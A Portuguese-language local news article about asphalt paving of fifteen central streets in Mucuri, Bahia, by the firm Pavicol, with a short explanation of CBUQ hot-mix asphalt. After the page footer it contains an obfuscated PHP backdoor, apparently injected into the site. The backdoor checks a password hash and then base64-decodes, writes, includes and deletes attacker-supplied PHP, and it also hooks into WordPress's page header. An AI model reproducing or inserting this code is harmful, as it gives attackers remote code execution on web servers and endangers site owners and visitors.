• SEJA BEM-VINDO

Começam as obras de asfaltamento das ruas centrais de Mucuri

Publicado em: 04/02/2022 Atualizado:: fevereiro 4, 2022

 

Começaram os trabalhos de pavimentação asfáltica de mais 15 ruas, avenidas e praças no centro de Mucuri, além de travessas que concentram grande movimento de pessoas e estabelecimentos comerciais. Desde o último dia 20 de janeiro, que o prefeito Roberto Carlos Figueiredo Costa, o “Robertinho” (DEM), já havia dado a ordem de serviço para as obras de requalificação das avenidas, ruas, praças e travessas da cidade de Mucuri para que estas vias públicas depois de niveladas recebam a massa asfáltica.

 

 

O calçamento da zona central de Mucuri era muito antigo, especialmente na parte histórica da cidade, portanto, está sendo preciso reparar o calçamento e nivelar todas as vias com uma primeira massa de asfalto, para somente depois, se aplicar a massa asfáltica em definitivo. Os serviços se iniciaram com a execução de drenagem, para verificar a fluidez da água. Limpeza e desobstrução das bocas de lobo da rede de esgotamento e correções de irregularidades nas vias públicas que receberão a borra do asfalto.

 

 

Asfalto

 

A massa asfáltica começou a ser aplicada nesta última terça-feira (1º/02), enquanto em outras ruas continuam os serviços de nivelamento e em muitos pontos, a troca de manilhas da rede de água pluvial. O asfalto dessa primeira etapa, vai proporcionar mais evolução urbana, conforto e segurança para todos que trafegam pelos roteiros beneficiados e mudará completamente a dinâmica da cidade, garantindo o desenvolvimento, progresso, conforto e segurança para todos, além de valorização dos empreendimentos localizados nas ruas, praças e avenidas.

 

 

Pavicol

 

As obras de asfaltamento das vias centrais de Mucuri estão sendo executadas pela Construtora Pavicol Ltda., uma das empresas de maior reconhecimento no ramo de pavimentação asfáltica no Estado. A Pavicol é uma empresa que faz pavimentação com referência na mesorregião da tríplice fronteira dos Estados da Bahia, Espírito Santo e Minas Gerais, munida de uma ampla infraestrutura, que permite a realização de diversas obras de pavimentação simultaneamente. A equipe técnica e de engenharia é qualificada, treinada sobre as soluções mais atuais em pavimentação para proporcionar os melhores serviços. Além disso, a Pavicol conta com equipamentos e ferramentas modernas, que garantem melhor produtividade e qualidade, reduzindo o tempo da obra.

 

 

Em Mucuri as obras de asfalto vão alcançar praças, 15 avenidas e ruas no centro urbano da cidade e algumas vias públicas alternativas de bairros centrais. As vias públicas estão ganhando obras de drenagem, recomposição e recapeamento asfáltico em CBUQ – Concreto Betuminoso Usinado a Quente, nas seguintes ruas: Avenida Central, Rua Belo Horizonte, Rua Oscar Teixeira Siqueira, Rua Diamantina, Rua Santarém, Rua Juscelino Kubitscheck, Rua Nova Viçosa, Rua Raul Gazzinelli, Rua Paquetá, Rua Ilhéus, Rua São José, Rua Jovita Fontes, Rua Pedreira Franco, Rua Severino Vieira, Rua Rui Barbosa, alamedas, travessas, canteiros e praças da cidade de Mucuri.

 

 

CBUQ

 

O Concreto Betuminoso Usinado a Quente (CBUQ), também conhecido como Concreto Asfáltico, é um dos tipos de revestimentos asfálticos mais utilizados nas vias urbanas e rodovias brasileiras com a função de impermeabilizar e conferir um acabamento nivelado e resistente. O CBUQ é uma mistura executada, aplicada e compactada a quente, produzida em usina apropriada devido ao controle tecnológico necessário. É composta por agregado graduado e cimento asfáltico, podendo conter material de enchimento se necessário. Cujos pavimentos são estruturas compostas por múltiplas camadas, sendo que o revestimento é a camada responsável por receber e transmitir a carga dos veículos, além de servir de proteção contra o intemperismo.

 

 

De acordo com o prefeito Robertinho, as ações estão sendo realizadas com recursos próprios do município e integram um plano de recomposição de várias vias públicas da cidade. E as obras de asfalto em Mucuri estão inclusas no primeiro lote, que faz parte de um grande pacote de obras planejado com dedicação absoluta para atender as necessidades de cada localidade do município. Já o segundo lote, atenderá ruas e avenidas do distrito de Itabatã. As obras de asfaltamento fazem parte do projeto de revitalização e modernização da cidade, que juntamente com o sistema moderno de iluminação por painéis de LED, objetiva embelezar e resgatar a potencialidade turística de Mucuri.

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}